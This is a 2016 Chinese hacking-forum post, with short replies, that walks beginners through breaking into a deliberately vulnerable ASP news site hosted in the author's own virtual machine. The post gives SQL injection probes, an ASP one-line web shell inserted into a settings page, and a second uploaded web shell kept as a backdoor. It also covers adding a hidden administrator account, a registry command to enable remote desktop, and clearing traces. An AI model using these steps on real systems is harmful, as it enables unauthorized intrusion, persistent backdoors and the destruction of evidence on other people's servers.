通过虚拟机搭建测试环境的简单入侵
本帖最后由 薯片 于 2016-6-2 10:47 编辑本文章仅供菜鸟参考,大神勿喷~
static/image/hrline/4.gif
之前过论坛共享里下载过那个渗透系统,这回终于派上用场了!到网上下载了一个源码,然后自己搭建了一个局域网,通过主机访问虚拟机里的网页,这个大家应该都会,这里就不再叙述了,(为了方便我采用的“超级小旋风”ASP服务器软件)配置了很久时间,终于ping通了虚拟机:Microsoft Windows [版本 6.1.7601]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。
C:\Users\Administrator>ping 192.168.0.11
正在 Ping 192.168.0.11 具有 32 字节的数据:
来自 192.168.0.11 的回复: 字节=32 时间<1ms TTL=128
来自 192.168.0.11 的回复: 字节=32 时间<1ms TTL=128
来自 192.168.0.11 的回复: 字节=32 时间<1ms TTL=128
来自 192.168.0.11 的回复: 字节=32 时间<1ms TTL=128
192.168.0.11 的 Ping 统计信息:
数据包: 已发送 = 4,已接收 = 4,丢失 = 0 (0% 丢失),
往返行程的估计时间(以毫秒为单位):
最短 = 0ms,最长 = 0ms,平均 = 0ms
C:\Users\Administrator>
额,不知道咋地了,截屏出现了问题,只能用系统自带的快捷键截屏了。。。。。。
http://a1.qpic.cn/psb?/V13PPNAA1PlpZC/QStKdKcYg10LrpUiDNqQ9dHrxbuVgEhdd0lfRc4FhHg!/b/dOEAAAAAAAAA&bo=LgI7AS4COwEDACU!&rf=viewer_4&t=5
Ok这样好像就表示搭建成功了,我用的是“三峡在线”的源码,因为这个源码可以说是漏洞百出,如果把里面的漏洞修补一遍的话,道不如重新写一个,所以作为菜鸟的我就拿来练手了。Ok,废话不多说,直接动手!随便点击一个链接,在地址栏可以看到:asp?id= 这种类型的字符串,根据感觉来看,很有可能出现注入漏洞:http://a1.qpic.cn/psb?/V13PPNAA1PlpZC/rywu.sxJdr2ScxZtznPl2VBKaR9ITmleyv92SWU61Y0!/b/dHEBAAAAAAAA&bo=LgI7AS4COwEDACU!&rf=viewer_4&t=5然后采用比较老套的手工注入测试,输入 and 1=1 后页面正常显示,输入 and 1=2 后就报错了,可以肯定,这个页面一定存在注入漏洞!http://a2.qpic.cn/psb?/V13PPNAA1PlpZC/YIZQyh4.4BF2e60fvXDHTDN86srxQ0yv2VEl6c7GFI4!/b/dI0BAAAAAAAA&bo=LgI7AS4COwEDACU!&rf=viewer_4&t=5额,手工挨个检测费时又费力,直接上工具!不知道咋地了,把工具包移动到win7系统后很多软件不能用了,明小子就光荣下岗了,没办法只能用老掉牙的“”啊D“”好了,自我感觉明小子好用一些。
切换到SQL注入检测页面,把刚才页面http://192.168.0.11/news/view.asp?id=150复制到里面然后回车,检测出来是access数据库,然后检测这个过程就不详细说了。。http://a2.qpic.cn/psb?/V13PPNAA1PlpZC/VNXE80cv6D5M6J0zrSkhhYVvSf513ABINOBz7qZAtnk!/b/dG8BAAAAAAAA&bo=LgI7AS4COwEDACU!&rf=viewer_4&t=5扫描出来:啊D注入工具http://www.d99net.net-------------------------------------注入点:http://192.168.0.11/news/view.asp?id=150检测的表段:---------------------------------------- : admin :admin : sxzx.net : sxzx.net
额,没加密,好吧直接扫后台登录。。。http://a1.qpic.cn/psb?/V13PPNAA1PlpZC/uI8f0*5o6V04kehKXVzlaHsaM9oYtDXFVAP83k7kaB4!/b/dHEBAAAAAAAA&bo=LgI7AS4COwEDACU!&rf=viewer_4&t=5
在系统设置页面插入一句话木马:"%><%eval request("sb")%><%'",然后架出菜刀。链接配置页面:http://192.168.0.11/inc/setup.asp密码是:sbhttp://a1.qpic.cn/psb?/V13PPNAA1PlpZC/hQfgZZ.4QnD.ZocqjMC.E7vF32npXujZo5aQcsfdAiQ!/b/dAsBAAAAAAAA&bo=LgI7AS4COwEDACU!&rf=viewer_4&t=5链接成功,然后可以上传一个大马,留下后门,以便以后再来。。(神经病,自己在自己电脑留后门,,,)然后上传了一个ASP大马,密码:ihonkerhttp://a2.qpic.cn/psb?/V13PPNAA1PlpZC/nH3DfkZOdtXc8SMJubou6pNBv9I9lsJtaNuyobgsoyA!/b/dAwBAAAAAAAA&bo=LgI7AS4COwEDACU!&rf=viewer_4&t=5麻蛋,这都不行!那就先用菜刀的终端功能添加个管理员~运行net user $abc 123 /add添加个隐藏账号,然后运行:netlocalgroup administrators $abc /add 提升为管理权限。http://a1.qpic.cn/psb?/V13PPNAA1PlpZC/52NYtmNf2ra.QMvsxGqDCKKqpyONkrVTL92AR8lh5Ao!/b/dI8BAAAAAAAA&bo=LgI7AS4COwEDACU!&rf=viewer_4&t=5也不知道红盟提供的这个系统开3389了没有,先连一下试试。http://a2.qpic.cn/psb?/V13PPNAA1PlpZC/t7mg68sLzw2vs2XsLnenh*Q14i743GFYAfUSRsdTOdE!/b/dI0BAAAAAAAA&bo=LgI7AS4COwEDACU!&rf=viewer_4&t=5没有开放,那就用一段命令:REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal""Server/vfDenyTSConnection /t REG_DWORD /d 0 /f尝试开启3389.
然后,又失败了,再想想其他办法。找到工具包里的:双开3389工具,切换到c盘根目录下,上传这些东西。然后再切换到虚拟终端运行: Tasklist/SVC>>c:\3389.txt,哈哈,搞定!,用3389桌面连接工具连接,输入用户名:$abc 密码:123 登录。http://a1.qpic.cn/psb?/V13PPNAA1PlpZC/JmzQg4fZdEaSqvvvOB3qeVNSPAC0ff0PoKHlf3pEpf0!/b/dAsBAAAAAAAA&bo=LgI7AS4COwEDACU!&rf=viewer_4&t=5成功拿下服务器,因为是用虚拟机搭建的局域网,所以没有经过路由器,所以上传东西不用做映射,直接用菜刀上传就好。
然后直接上传擦除工具到d盘,通过远程桌面操作。http://a1.qpic.cn/psb?/V13PPNAA1PlpZC/Q15y3XepZptG9XpeSZ80fP.E2D3H4GUxvufLVTNJkJ8!/b/dI8BAAAAAAAA&bo=LgI7AS4COwEDACU!&rf=viewer_4&t=5然后这时候再回过头来留个后门,总感觉这步晚了点。将大马改成后缀为.zip文件。同样通过菜刀上传到d盘,然后在远程桌面里把他剪切到网站目录下,然后改文件名为x_x.asp额,虽然这样好像不起什么作用,但改成这样舒服些,输入地址:http://192.168.0.11/x_x.asp密码:ihonker登录,成功添加后门。http://a1.qpic.cn/psb?/V13PPNAA1PlpZC/msl.4vxOF8zOg4Oe*R0cdGGx.22xoeZNu*gyISx40EE!/b/dI8BAAAAAAAA&bo=LgI7AS4COwEDACU!&rf=viewer_4&t=5然后再清理一下痕迹。到这就完成了,整个入侵的过程也是特别基础,并且是本地搭建的,小白们可以借鉴一下。
static/image/hrline/2.gif
http://a1.qpic.cn/psb?/V13PPNAA1PlpZC/9zGMG7KobHX1HSKA11Es.e.pA*fCWog8gE0T*jNl1tA!/b/dAsBAAAAAAAA&bo=agBqAGoAagADACU!&rf=viewer_4&t=5
----薯片
手机版看不到图片,可以切换到pc版。 图都转绿了 每当我看到你们用啊D 明小子这类东西,总会有一种深深的自责…… 90_ 发表于 2016-6-2 12:37
每当我看到你们用啊D 明小子这类东西,总会有一种深深的自责……
90_ 发表于 2016-6-2 12:37
每当我看到你们用啊D 明小子这类东西,总会有一种深深的自责……
RE: 通过虚拟机搭建测试环境的简单入侵
90_ 发表于 2016-6-2 12:37每当我看到你们用啊D 明小子这类东西,总会有一种深深的自责……
{:2_25:}我也感觉好羞耻,所以我要继续学习新技术。
RE: 通过虚拟机搭建测试环境的简单入侵
porry 发表于 2016-6-2 12:18图都转绿了
啊?什么转绿了,这是我前天晚上写的, 为什么图加载不出来? 周翔宇 发表于 2016-6-4 23:17
为什么图加载不出来?
切换到pc版就可以了,
页:
[1]
2